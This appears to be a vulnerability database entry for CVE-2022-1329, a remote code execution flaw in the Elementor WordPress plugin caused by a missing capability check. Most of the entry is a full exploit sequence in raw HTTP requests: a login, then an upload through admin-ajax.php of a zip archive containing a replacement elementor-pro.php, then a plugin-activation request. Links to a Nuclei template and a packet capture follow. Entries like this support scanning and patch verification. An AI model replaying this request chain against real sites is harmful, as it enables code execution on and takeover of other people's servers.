| Title | Elementor Website Builder - Remote Code Execution |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Fixed in version 3.6.3 |
| CVSS Score | 8.8 |
| EPSS Score | 0.93475 |
| CVE ID | CVE-2022-1329 |
| CWE ID | CWE-434,CWE-862 |
| Tags | cve2022 cve rce wordpress wp-plugin wp elementor authenticated intrusive fileupload vkev vuln |
The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=gp1CTe&pwd=LSA2Uz&wp-submit=Log+In
GET /wp-admin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Content-Length: 1409
Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea
Accept-Encoding: gzip
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="action"
elementor_upload_and_install_pro
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="_nonce"
WICTGM
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="fileToUpload"; filename="38F5MXtR3Uk37E41z7qjsluICY5.zip"
PK �"gV elementor-pro/UT
�,d�,d�,dux � � PK |(gV : elementor-pro/elementor-pro.phpUT
<6d=6d<6dux � � �R]O�@|�ł��|��Vj(����q@����^ǧ��Nw����9����o������~�Х����T�.a�*�C$�B锁�Q�z�63\;�d�w�Z��j.r4P2���a`2��A�B���@�g���9���lA�R.Z���K̹�r�jx*e�#t`3s�j�����P:�m�����LU�UOV�&��n��~��4����vmx�^�����ҏ kW*�㐧��{4�q��s��_E�a��"?)�gתb�濎�/5�~y磝\f��B�5��-�-Tn�0�`U�V��I�U
��Lέ3<�)s��̻�P��kOBo����L�ʂ*���dN�I4L��N���g(-�/��Hӆ�w���V3�-@Nuˍ�p�2cK͚L�AЦ��ΟV}�(�!�S*M�K��>+.��Ţ-�O`x'7w���#<�qN��3S`T�%n�x�'f��0��$�3|���
��W��q�H�a8N&�lûB��q2�o���xz7�:0C����/7�&r,GǸ�~�n���=n-���O�(�q�2Ǘ���ϣ���AWy��
������>j�>�z��ޗ�#�߂�PK~K�f : PK �"gV �A elementor-pro/UT
�,d�,d�,dux � � PK |(gV~K�f : ��L elementor-pro/elementor-pro.phpUT
<6d=6d<6dux � � PK �
--336b29d7aee0463d8b651303eab505ea--
GET /index.php?activate=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1329.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-1329.pcap
N/AN/A